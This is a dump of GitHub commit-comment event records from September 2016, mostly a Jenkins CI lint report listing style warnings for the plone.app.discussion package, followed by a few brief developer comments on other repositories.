{"id":"4642761108","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":19239275,"position":null,"line":null,"path":null,"commit_id":"b5f67a0a1a2438f043cb1c68e98ba0bdfd696eed","created_at":"2016-09-30T10:52:59Z","updated_at":"2016-09-30T10:52:59Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.discussion/98/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:89:17: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/comment.py:77:28: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:170:40: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:172:30: S001 found %s formatter\nplone/app/discussion/comment.py:176:48: S001 found %s formatter\nplone/app/discussion/comment.py:209:14: D001 found declareProtected replace it with AccessControl.ClassSecurityInfo.protected\nplone/app/discussion/comment.py:245:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:254:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:263:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:272:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:298:21: Q000 Remove bad quotes.\nplone/app/discussion/contentrules.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/contentrules.py:18:5: E731 do not assign a lambda expression, use a def\nplone/app/discussion/contentrules.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:59:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:70:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:81:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:92:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/conversation.py:67:27: Q000 Remove bad quotes.\nplone/app/discussion/conversation.py:205:16: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:214:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:220:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:324:8: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:453:29: Q000 Remove bad quotes.\nplone/app/discussion/events.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/events.py:11:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:33:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:38:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:43:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/interfaces.py:135:17: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:161:65: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:247:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:262:21: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:280:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:284:23: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:291:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:308:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:390:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:394:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:398:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:402:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:406:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/patches.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/patches.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/testing.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:13:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:14:1: B901 blind except: statement\nplone/app/discussion/testing.py:15:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:66:14: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:78:10: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:81:10: Q000 Remove bad quotes.\nplone/app/discussion/tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/upgrades.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/upgrades.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/vocabularies.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:89:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:107:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:114:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:135:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:142:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:158:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:173:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:191:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:199:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:212:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:224:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:235:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:243:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:250:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:280:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:299:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:307:47: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:347:40: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:380:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:386:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:429:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:436:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:49: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:533:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:578:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comment.py:55:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:56:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:57:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:106:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:108:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:114:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:130:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:131:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:135:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:136:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:158:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:166:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:179:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:182:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:187:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:231:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:262:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:267:23: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:304:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:329:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:371:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:407:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:442:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:450:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:459:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:468:38: S001 found %s formatter\nplone/app/discussion/tests/test_comments_viewlet.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comments_viewlet.py:43:1: F811 redefinition of unused 'IConversation' from line 38\nplone/app/discussion/tests/test_comments_viewlet.py:112:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:126:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:134:43: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:135:60: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:137:66: W291 trailing whitespace\nplone/app/discussion/tests/test_comments_viewlet.py:180:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:194:59: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:196:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_comments_viewlet.py:236:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:281:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:316:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:405:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:406:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:411:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:416:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:417:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:418:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:429:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:430:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:431:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:487:63: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_contentrules.py:6:1: F401 'notify' imported but unused\nplone/app/discussion/tests/test_contentrules.py:22:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_contentrules.py:51:24: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:52:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:53:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:54:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:59:5: E303 too many blank lines (2)\nplone/app/discussion/tests/test_contentrules.py:117:38: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:121:38: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:122:34: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:123:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:126:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_contentrules.py:135:35: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_contentrules.py:145:44: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_controlpanel.py:36:18: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:43:56: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:92:5: F811 redefinition of unused 'test_edit_comment_enabled' from line 84\nplone/app/discussion/tests/test_controlpanel.py:145:5: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_conversation.py:31:1: B901 blind except: statement\nplone/app/discussion/tests/test_conversation.py:91:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:93:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:94:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:95:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:518:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:560:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:565:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:570:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:575:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:969:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:973:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:978:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_events.py:15:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:29:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:32:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:35:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:40:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:81:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:99:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:138:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:151:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:157:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_events.py:171:38: S001 found %s formatter\nplone/app/discussion/tests/test_functional.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_indexers.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:54:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:55:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:62:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:63:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:70:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:71:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:110:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:112:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:139:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:140:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_migration.py:55:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:68:14: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:214:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_moderation_view.py:111:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:119:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:127:38: S001 found %s formatter\nplone/app/discussion/tests/test_notifications.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_notifications.py:37:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:64:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:86:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:87:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:102:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:130:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:146:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:151:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:176:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:227:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:228:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:234:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:238:13: S001 found % formatter\nplone/app/discussion/tests/test_tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_tool.py:32:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:42:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:15: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_workflow.py:58:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:94:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_workflow.py:133:38: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:153:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:154:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:203:38: S001 found %s formatter\nplone/app/discussion/browser/captcha.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/captcha.py:64:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comment.py:45:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:45:20: S001 found %s formatter\nplone/app/discussion/browser/comment.py:47:41: S001 found %s formatter\nplone/app/discussion/browser/comment.py:53:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:95:52: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:99:44: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:99:66: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:101:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:101:58: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:115:1: E265 block comment should start with '# '\nplone/app/discussion/browser/comments.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comments.py:94:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:100:35: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:128:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:129:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:130:42: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:132:1: C901 'CommentForm.handleComment' is too complex (15)\nplone/app/discussion/browser/comments.py:141:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:142:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:157:16: E713 test for membership should be 'not in'\nplone/app/discussion/browser/comments.py:210:53: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:251:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:252:22: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:275:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:276:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:332:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:335:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:343:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:351:37: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:422:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:422:21: S001 found %s formatter\nplone/app/discussion/browser/comments.py:469:17: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/controlpanel.py:34:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:90:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:91:48: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:96:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:41: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:113:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:119:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:126:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:128:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:131:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:135:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:141:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:168:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/conversation.py:20:1: B901 blind except: statement\nplone/app/discussion/browser/conversation.py:32:1: C901 'ConversationView._enabled_for_archetypes' is too complex (14)\nplone/app/discussion/browser/conversation.py:138:12: P002 found \"hasattr\", consider replacing it\nplone/app/discussion/browser/conversation.py:138:29: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/migration.py:37:1: C901 'View.__call__' is too complex (32)\nplone/app/discussion/browser/migration.py:44:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:48:16: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:80:26: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:82:31: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:83:22: S001 found %s formatter\nplone/app/discussion/browser/migration.py:181:25: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:181:26: S001 found %s formatter\nplone/app/discussion/browser/migration.py:191:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:191:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:205:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:205:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:206:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:206:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:207:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:207:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:209:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:210:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:228:21: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:229:31: S001 found %s formatter\nplone/app/discussion/browser/migration.py:237:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:238:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:28: S001 found %s formatter\nplone/app/discussion/browser/migration.py:246:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:248:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:249:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:250:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:252:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:253:13: S001 found % formatter\nplone/app/discussion/browser/migration.py:257:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:257:18: S001 found %s formatter\nplone/app/discussion/browser/migration.py:261:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:262:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:266:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:267:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/moderation.py:100:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:101:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:141:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:142:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/traversal.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/traversal.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/traversal.py:32:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/validator.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-30T10:52:59Z"}
{"id":"4642761145","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":19239276,"position":null,"line":null,"path":null,"commit_id":"dc7679e2fb358a4184f76c1f06ade8a0682a6c7c","created_at":"2016-09-30T10:52:59Z","updated_at":"2016-09-30T10:52:59Z","body":"Wow great! Thank you 👍 "}},"created_at":"2016-09-30T10:52:59Z"}
{"id":"4642772386","type":"CommitCommentEvent","actor":{"login":"HaidenTenno"},"repo":{"name":"HaidenTenno/am-C-C-practical-course"},"payload":{"comment":{"id":19239303,"position":19,"line":19,"path":"2016_осень/Работы_студентов/Тартынских_Петр/Занятие 2/2.1.1.c","commit_id":"13071f189a8cad3b4718f2b01d5de669a45e3592","created_at":"2016-09-30T10:55:58Z","updated_at":"2016-09-30T10:55:58Z","body":"Этот момент лишний. Забыл убрать"}},"created_at":"2016-09-30T10:55:58Z"}
{"id":"4642781432","type":"CommitCommentEvent","actor":{"login":"procedural"},"repo":{"name":"procedural/flycamera"},"payload":{"comment":{"id":19239316,"position":null,"line":null,"path":null,"commit_id":"d01f4907cad13c61aa9861ec360f16f18c78ba4b","created_at":"2016-09-30T10:58:15Z","updated_at":"2016-09-30T10:58:15Z","body":"Forms odd symmetry:\r\n![ctmkqxwwyaeyabu](https://cloud.githubusercontent.com/assets/1072168/18989654/d116a2fa-8715-11e6-8ef5-5c28fc2d189f.jpg)\r\n\r\n"}},"created_at":"2016-09-30T10:58:15Z"}
{"id":"4642781738","type":"CommitCommentEvent","actor":{"login":"wuoshiwzm"},"repo":{"name":"wuoshiwzm/lara"},"payload":{"comment":{"id":19239317,"position":null,"line":null,"path":null,"commit_id":"adc33dd7500d86b880faa8f02051c7641bebd4a6","created_at":"2016-09-30T10:58:20Z","updated_at":"2016-09-30T10:58:20Z","body":"accept"}},"created_at":"2016-09-30T10:58:20Z"}
{"id":"4642790179","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19239347,"position":null,"line":null,"path":null,"commit_id":"dd038562dfdfd2f4b3a44a3e8e2232c064b51540","created_at":"2016-09-30T11:00:24Z","updated_at":"2016-09-30T11:00:24Z","body":"I thought this was intentional."}},"created_at":"2016-09-30T11:00:24Z"}
{"id":"4642791192","type":"CommitCommentEvent","actor":{"login":"regislebrun"},"repo":{"name":"openturns/openturns"},"payload":{"comment":{"id":19239353,"position":null,"line":null,"path":null,"commit_id":"e6ebe11ba570dcc4c78b2d113bfd83d1b4267ae6","created_at":"2016-09-30T11:00:38Z","updated_at":"2016-09-30T11:00:38Z","body":"+1. The method setValues() is missing in BetaMuSigma. Perhaps there is room for it in this PR?"}},"created_at":"2016-09-30T11:00:38Z"}
